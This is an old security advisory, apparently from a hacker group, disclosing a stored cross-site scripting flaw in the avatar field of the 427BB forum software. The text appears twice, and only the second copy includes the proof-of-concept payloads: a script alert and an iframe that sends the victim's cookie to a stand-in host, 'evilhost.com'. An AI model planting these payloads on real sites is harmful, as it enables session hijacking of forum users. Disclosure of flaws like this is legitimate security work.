[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][]
[]
[] HRG - Hackerlounge Research Group
[] Release: HRG006
[] Monday 03/01/05
[] 427BB
[]
[] The author can't be held responsible for any
damage
[] done by a reader. You have your own resonsibility
[] Please use this document like it's meant to.
[]
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
Vulnerable: 427BB (Any Version)
---
General Information:
427BB Is a simple board and I have no idea why I'm
releasing this because Its very unpopular but what
the hell. Its based on PHP And MySQL
---
Description:
In profile.php there is a avatar field that is
vulnerable to a XSS attack by a remote attacker. The
Avatar string isn't filtered of < >. This makes is
very easy for a attacker to steal a session.
---
PoC Code
Place the following code into the avatar field and
save it then reload the profile page and it will
execute this code.
Vendor has been notified, expect official patch
soon.
---
Greetz:
All the people at hackerlounge.com, JWT,
TGS-Security.com and JWT-Security.net.
Specifically:
Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster,
Modzilla, Pingu, Jake Johnson, Afterburn, airo,
cardiaC, chis, ComputerGeek, deep_phreeze, dudley,
evasion, eXtacy, Mattewan, Afterburn,
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite,
Slarty, NoUse, Snake (I hate you), Surreal (I hate
you), -=Vanguard=-, The_IRS, puNKiey, driedice,
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER,
voteforpedro, Cryptic_Override, kodaxx,
~CreEpy~NoDquE~, Brainscan, the_exode,
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and
anyone else I forgot.
---
Credit:
HRG - Hackerlounge Research Group
http://www.Hackerlounge.com
Partial credit is also given to
lancastertechnologies.org, founded by JWT.
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
[]
[] HRG - Hackerlounge Research Group
[] Release: HRG006
[] Monday 03/01/05
[] 427BB
[]
[] The author can't be held responsible for any
damage
[] done by a reader. You have your own resonsibility
[] Please use this document like it's meant to.
[]
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][]
[]
[] HRG - Hackerlounge Research Group
[] Release: HRG006
[] Monday 03/01/05
[] 427BB
[]
[] The author can't be held responsible for any
damage
[] done by a reader. You have your own resonsibility
[] Please use this document like it's meant to.
[]
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
Vulnerable: 427BB (Any Version)
---
General Information:
427BB Is a simple board and I have no idea why I'm
releasing this because Its very unpopular but what
the hell. Its based on PHP And MySQL
---
Description:
In profile.php there is a avatar field that is
vulnerable to a XSS attack by a remote attacker. The
Avatar string isn't filtered of < >. This makes is
very easy for a attacker to steal a session.
---
PoC Code
Place the following code into the avatar field and
save it then reload the profile page and it will
execute this code.
"><script
language="javascript">alert("b00");</script><"
Some more code this by Blademaster
"><iframe
SRC="http://www.evilhost.com/cookiestealer.php?cookie="
WIDTH=1 HEIGHT=1></iframe><"
---
Fix and Vendor status:
Vendor has been notified, expect official patch
soon.
---
Greetz:
All the people at hackerlounge.com, JWT,
TGS-Security.com and JWT-Security.net.
Specifically:
Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster,
Modzilla, Pingu, Jake Johnson, Afterburn, airo,
cardiaC, chis, ComputerGeek, deep_phreeze, dudley,
evasion, eXtacy, Mattewan, Afterburn,
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite,
Slarty, NoUse, Snake (I hate you), Surreal (I hate
you), -=Vanguard=-, The_IRS, puNKiey, driedice,
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER,
voteforpedro, Cryptic_Override, kodaxx,
~CreEpy~NoDquE~, Brainscan, the_exode,
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and
anyone else I forgot.
---
Credit:
HRG - Hackerlounge Research Group
http://www.Hackerlounge.com
Partial credit is also given to
lancastertechnologies.org, founded by JWT.
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
[]
[] HRG - Hackerlounge Research Group
[] Release: HRG006
[] Monday 03/01/05
[] 427BB
[]
[] The author can't be held responsible for any
damage
[] done by a reader. You have your own resonsibility
[] Please use this document like it's meant to.
[]
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
[ reply ]